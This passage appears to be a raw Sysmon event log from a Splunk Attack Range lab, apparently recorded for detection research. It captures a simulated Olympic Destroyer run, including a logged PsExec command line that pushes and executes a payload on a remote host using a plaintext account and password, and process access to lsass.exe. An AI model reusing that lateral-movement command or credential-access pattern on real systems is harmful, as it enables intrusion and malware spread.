Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7B1A8D58C20FE4DC1F26F6E714B2E5E,SHA256=F7539C08A7F760CD13B7A054BA2A9BB51C4605E1040608EED1A539E66E1B1120,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000218440Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:50.186{4F8D34B0-13E1-6216-A404-000000003902}35202544C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294047Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:51.975{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-13E3-6216-7E06-000000003802}5228C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000294046Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:51.971{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294045Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:51.971{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294044Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:51.970{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294043Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:51.970{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294042Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:51.968{C8EA50B7-12E6-6216-4B05-000000003802}67924840C:\Temp\olympic_destroyer.exe{C8EA50B7-13E3-6216-7E06-000000003802}5228C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000294041Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:51.967{C8EA50B7-13E3-6216-7E06-000000003802}5228C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\ip-10-0-1-1.eu-central-1.compute.internal -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000294040Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:51.967{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-13E3-6216-7E06-000000003802}5228C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000294039Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:51.321{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6FA6DC35745452339FD49574F64030CE,SHA256=7C8C9F7299092DA7F7332C33A536E40C24A09F490DF92958EFDA06A184189D2F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218457Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:51.465{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF1344B2E396B8A20EB9EE3CDB66DAEF,SHA256=4451AF6E707C48B1B9C24DDC986E0CFC249D19D7E160F19B335F61074D3F093E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000218456Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:51.435{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-13E3-6216-A504-000000003902}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218455Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:51.435{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218454Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:51.435{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218453Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:51.435{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218452Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:51.435{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218451Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:51.435{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218450Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:51.435{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218449Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:51.435{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218448Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:51.435{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218447Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:51.435{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218446Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:51.435{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-13E3-6216-A504-000000003902}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000218445Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:51.435{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-13E3-6216-A504-000000003902}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000218444Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:51.437{4F8D34B0-13E3-6216-A504-000000003902}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000218459Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:52.575{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8BC5E5C1797917DF7E3A432DC3DAD3D9,SHA256=E583623E85A04C98B0620439F1E973DFA3AB0A728405FCA0D0505D3421FDF0AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294058Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:52.974{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=B02C7BF1B0259659D19E53D6B5093C65,SHA256=B1DB4178185D94C8775481E56F276A43C60CAC5C6A34EE453986E7FD5F054C0F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294057Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:52.970{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=3CC66A02F99FF9CC63CA699235B00AA6,SHA256=F8062304BD91B030FD049F2CD1D270EDF211A60D3E7FE1739C6E9A12B37BE717,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294056Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:52.348{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB94FE202B31EC041D6230C4B48CFB34,SHA256=2BFCD6DF835D8C9FC90D2F7D66D9C34E8CF6FAEF3BC337275505AFC25828EB08,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000294055Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:52.264{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-13E3-6216-7E06-000000003802}5228C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294054Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 